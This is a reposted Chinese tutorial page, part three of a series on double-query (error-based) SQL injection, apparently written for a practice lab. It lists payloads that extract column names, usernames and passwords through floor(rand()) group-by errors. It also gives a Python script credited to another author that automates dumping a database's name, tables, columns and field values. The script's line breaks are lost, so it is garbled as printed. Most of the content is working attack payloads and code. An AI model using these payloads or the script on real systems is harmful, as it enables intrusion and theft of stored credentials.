江苏龙网

  1. 首页 > 人文 > >

白帽子:SQL注入之双查询注入( 三 )


白帽子:SQL注入之双查询注入文章插图
总共四张表 , 我们在第三张拿到了我们想要的 。
知道了表名 , 看列值 , 构造payload:?id=-1' union select 1,count(*),concat( (select column_name from information_schema.columns where table_name='users' limit 4,1),floor(rand(4)*2)) as a from information_schema.columns group by a --+
我通过修改limit X,1里X的值 , 在3 , 1的时候看到了password字段
白帽子:SQL注入之双查询注入文章插图
在9 , 1的时候得到了用户名字段
白帽子:SQL注入之双查询注入文章插图
开始拿用户名和密码 , 构造payload:?id=-1' union select 1,count(*),concat( (select username from users limit 0,1),floor(rand(4)*2)) as a from information_schema.columns group by a --+
白帽子:SQL注入之双查询注入文章插图
和?id=-1' union select 1,count(*),concat( (select password from users limit 0,1),floor(rand(4)*2)) as a from information_schema.columns group by a --+
白帽子:SQL注入之双查询注入文章插图
这里要注意用户名和密码的列数应改相对 。
是不是jio着麻烦 , 附上Mochaaz大佬的python代码
import requestsfrom bs4 import BeautifulSoupdb_name = ''table_list = []column_list = []url = ''''''### 获取当前数据库名 ###print('当前数据库名:')payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)*2)))--+'''r = requests.get(url+payload)db_name = r.text.split(':')[-2]print('[+]' + db_name)### 获取表名 ###print('数据库%s下的表名:' % db_name)for i in range(50):payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (db_name,i)r = requests.get(url+payload)if 'group_key' not in r.text:breaktable_name = r.text.split(':')[-2]table_list.append(table_name)print('[+]' + table_name)### 获取列名 ####### 这里以users表为例 ####print('%s表下的列名:' % table_list[-1])for i in range(50):payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (table_list[-1],i)r = requests.get(url + payload)if 'group_key' not in r.text:breakcolumn_name = r.text.split(':')[-2]column_list.append(column_name)print('[+]' + column_name)### 获取字段值 ####### 这里以username列为例 ####print('%s列下的字段值:' % column_list[-2])for i in range(50):payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (column_list[-2],db_name,table_list[-1],i)r = requests.get(url + payload)if 'group_key' not in r.text:breakdump = r.text.split(':')[-2]print('[+]' + dump)


推荐阅读


上一篇:智慧教室&共享教室

下一篇:年年都考的数字鸿沟有了新进展?彭波老师的论文给出了解答!